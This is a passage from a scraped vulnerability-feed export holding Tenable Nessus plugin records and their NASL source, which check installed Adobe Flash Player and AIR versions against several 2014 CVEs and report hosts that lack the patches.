&& iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.77\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 77\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' 
+ file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 13.0.0.182 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.275\";\n else\n fix = \"13.0.0.182\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value: TRUE);\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:13", "description": "According to its version, the instance of Adobe AIR on the remote Mac OS X host is 4.0.0.1628 or earlier. It is, therefore, reportedly affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. 
(CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_13_0_0_83.NASL", "href": "https://www.tenable.com/plugins/nessus/73434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73434);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Adobe AIR for Mac <= 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)\");\n script_summary(english:\"Checks version gathered by local check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Adobe AIR on the remote Mac\nOS X host is 4.0.0.1628 or earlier. It is, therefore, reportedly\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. 
(CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 13.0.0.83 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '4.0.0.1628';\nfixed_version_for_report = '13.0.0.83';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n\n # XSS\n set_kb_item(name:'www/0/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-08T14:09:55", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.261 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. 
(CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-07.NASL", "href": "https://www.tenable.com/plugins/nessus/72606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72606);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n script_name(english:\"Flash Player <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on the\nremote Windows host is equal or prior to 11.7.700.261 / 11.8.x / 11.9.x\n/ 12.0.0.70. It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. 
(CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.269 / 12.0.0.70 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.44\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 44)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.261\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 261)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.44\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 44\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == 
\"Chrome_Pepper\")\n info += '\\n Fixed version : 12.0.0.70 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.269\";\n else\n fix = \"12.0.0.70\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:31", "description": "Versions of Adobe Flash player prior to 11.7.700.275 / 13.0.0.182 are outdated and thus unpatched for the following vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n - A double free vulnerability exists that could result in arbitrary code execution. 
(CVE-2014-0502)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8807.PRM", "href": "https://www.tenable.com/plugins/nnm/8807", "sourceData": "Binary data 8807.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:28:09", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n - APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh) updated.", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0277-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-157.NASL", "href": "https://www.tenable.com/plugins/nessus/75267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-157.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75267);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n 
script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0277-1)\");\n script_summary(english:\"Check for the openSUSE-2014-157 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n - APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=865021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-02/msg00069.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.341-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.341-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.341-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 
security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:37", "description": "The remote host is missing KB2929825. It is, therefore, affected by multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "MS KB2934802: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2934802.NASL", "href": "https://www.tenable.com/plugins/nessus/72608", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72608);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n script_xref(name:\"MSKB\", value:\"2934802\");\n\n script_name(english:\"MS KB2934802: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is 
missing KB2929825. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. (CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2934802/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2934802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 12.0.0.70\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 12 ||\n (\n iver[0] == 12 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 70)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 
12.0.0.70\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:38", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal to or prior to 11.7.700.261 / 11.8.x / 11.9.x / 12.0.0.44. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. 
(CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_12_0_0_70.NASL", "href": "https://www.tenable.com/plugins/nessus/72607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72607);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.261 / 11.8.x /\n11.9.x / 12.0.0.44. It is, therefore, potentially affected by\nmultiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. 
(CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.269 / 12.0.0.70 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 